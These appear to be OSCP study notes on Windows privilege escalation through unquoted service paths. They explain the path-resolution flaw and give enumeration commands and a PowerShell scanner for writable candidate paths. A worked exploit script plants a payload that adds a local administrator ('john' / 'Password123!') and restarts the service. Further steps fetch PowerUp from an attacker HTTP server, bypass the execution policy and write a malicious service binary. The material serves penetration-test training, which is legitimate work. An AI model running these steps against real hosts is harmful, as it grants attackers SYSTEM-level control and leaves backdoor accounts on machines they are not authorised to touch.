OSCP Notes

Unquoted Service Paths

This attack relies on how Windows resolves a service binary path that is unquoted and contains spaces.

Introduction

When a service starts, the Service Control Manager launches its binary with CreateProcess. The executable can be given either in the lpApplicationName parameter or, with lpApplicationName set to NULL, as the first token of lpCommandLine. Service binaries are launched the second way, so if the ImagePath is unquoted and contains spaces, CreateProcess cannot tell where the executable name ends and the arguments begin, and it tries each space-delimited prefix in turn, appending .exe.

For example, the path C:\Program Files\program folder\binary.exe is tried in the following order:

C:\Program.exe
C:\Program Files\program.exe
C:\Program Files\program folder\binary.exe

If an attacker can create one of the earlier candidates (C:\Program.exe or C:\Program Files\program.exe), that file runs instead of the real binary, under the service account (often LocalSystem). On a default installation neither C:\ nor C:\Program Files is writable by standard users, so an unquoted path is only exploitable when one of the intermediate directories on the lookup path has been given weak permissions.

Enumeration

Listing services with their binary paths (the second command filters out binaries under C:\Windows and any path that is already quoted):

Get-CimInstance -ClassName win32_service | Select Name,State,PathName
wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """

Checking whether the current user can create files in each directory on the lookup path (in the example above, C:\ and C:\Program Files\):

icacls "<path>"

The table below describes the permission masks shown in icacls output:

Mask  Permissions
F     Full access
M     Modify access
RX    Read and execute access
R     Read-only access
W     Write-only access

What matters for this attack is the right to create a file in the directory, so look for W, M or F granted to Everyone, Users, Authenticated Users or the current user (and the (OI)(CI) inheritance flags that propagate them). RX on the directory is not enough.
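The enumeration steps above, combined into one script. This is an added example and not code from the original page or from PowerSploit: it lists every service whose binary path is unquoted and contains a space, derives the candidate paths CreateProcess would try in order, and probes whether the current user can create a file in each candidate's parent directory. The function name Get-UnquotedServiceCandidates is made up for this example; the C:\Windows exclusion mirrors the wmic filter above.

```powershell
# Added example (not from the original page). Run as the low-privileged user on
# the target; it reads Win32_Service and only writes a temporary probe file in
# directories it is testing (noisier than icacls, but gives a definite answer).

function Get-UnquotedServiceCandidates {
    # PathName is the raw ImagePath, including arguments. Skip quoted paths
    # and anything under the Windows directory, as the wmic one-liner does.
    $services = Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.PathName -notmatch '^"' -and
            $_.PathName -notmatch '^[A-Za-z]:\\Windows\\'
        }

    foreach ($svc in $services) {
        # Keep the path up to the first ".exe"; paths without an extension are
        # skipped here and should be reviewed by hand.
        if ($svc.PathName -match '^(.*?\.exe)') { $imagePath = $Matches[1] } else { continue }
        if ($imagePath -notmatch ' ') { continue }

        # CreateProcess tries each space-delimited prefix in order, with .exe appended.
        # The last candidate is the real binary, so stop one short of it.
        $parts = $imagePath -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir       = Split-Path -Path $candidate -Parent
            $writable  = $false

            if (Test-Path -LiteralPath $dir) {
                $probe = Join-Path -Path $dir -ChildPath ([System.IO.Path]::GetRandomFileName())
                try {
                    [System.IO.File]::WriteAllText($probe, '')
                    $writable = $true
                    Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
                } catch {
                    $writable = $false   # access denied: directory is not writable
                }
            }

            [PSCustomObject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode    # Auto-start services also fire on reboot
                RunAs     = $svc.StartName    # LocalSystem is the interesting case
                ImagePath = $imagePath
                Candidate = $candidate
                Directory = $dir
                Writable  = $writable
            }
        }
    }
}

# Show only the candidates we could actually plant a binary at.
Get-UnquotedServiceCandidates | Where-Object Writable | Format-Table -AutoSize
```

A hit with Writable = True and RunAs = LocalSystem is the finding; note the StartMode too, because an Auto-start service can be triggered by a reboot when the current user is not allowed to restart it.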

Exploit

The process is the same as Service Binary Hijacking, except that the payload is written to one of the intermediate candidate paths (for example C:\Program Files\program.exe) instead of replacing the real binary. Compile a payload that adds a local administrator, copy it to the writable candidate path, then restart the service. If the current user is not allowed to stop and start the service (sc.exe sdshow <service_name> prints its DACL), the service must be triggered another way: a reboot, which needs SeShutdownPrivilege, will start any automatic-start service.
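The exploitation step written out, as an added example that is not part of the original page. Every specific in it is hypothetical: a service named VulnSvc with the unquoted ImagePath C:\Program Files\program folder\binary.exe, a writable C:\Program Files\, and a payload already compiled and uploaded as C:\Users\Public\adduser.exe that runs the same net user / net localgroup commands PowerUp uses by default.

```powershell
# Added example (not from the original page); names and paths are hypothetical.
$service   = 'VulnSvc'
$candidate = 'C:\Program Files\program.exe'    # second prefix CreateProcess tries
$payload   = 'C:\Users\Public\adduser.exe'     # runs: net user john Password123! /add
                                               #       net localgroup Administrators john /add

# 1. Plant the payload at the candidate path. This fails with "Access denied"
#    if the directory is not really writable, so there is no point continuing.
Copy-Item -LiteralPath $payload -Destination $candidate -ErrorAction Stop

# 2. Make the SCM resolve the path again by restarting the service. Standard
#    users often lack the stop/start rights; the service DACL (SDDL) shows who
#    has them. "sc" alone is an alias for Set-Content in PowerShell, hence sc.exe.
sc.exe sdshow $service
try {
    Restart-Service -Name $service -ErrorAction Stop
} catch {
    Write-Warning "Cannot restart ${service}: $($_.Exception.Message)"
    # Fallback when the service is Auto-start: a reboot triggers it, which
    # requires SeShutdownPrivilege. Confirm both on the target before using it.
    # if ((whoami /priv) -match 'SeShutdownPrivilege') { shutdown /r /t 0 }
}

# 3. Verify that the payload ran as the service account.
net user john
net localgroup Administrators
```

Clean up afterwards by removing the planted file and the added user, otherwise the finding is left as a live backdoor on the client's host.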

Automated Process

It is possible to automate the whole process with PowerUp from the PowerSploit collection:

Downloading PowerUp.ps1:

iwr -uri http://<attacker_http_server>/PowerUp.ps1 -Outfile PowerUp.ps1

Bypassing Execution Policy:

powershell -ep bypass

Importing PowerUp.ps1:

. .\PowerUp.ps1

Enumerate services with unquoted paths:

Get-UnquotedService

Exploiting by writing a malicious service binary to the hijack path reported by Get-UnquotedService (by default the binary creates a local user called john with the password Password123! and adds it to the local Administrators group):

Write-ServiceBinary -Name '<service_name>' -Path "<binary_path>"

Triggering the exploit by restarting the service (this needs stop/start rights on the service; otherwise a reboot is required for an automatic-start service):

Restart-Service <service_name>

References


PowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploit (GitHub)
Windows-Local-Privilege-Escalation-Cookbook/Notes/UnquotedServicePath.md at master · nickvourd/Windows-Local-Privilege-Escalation-Cookbook (GitHub)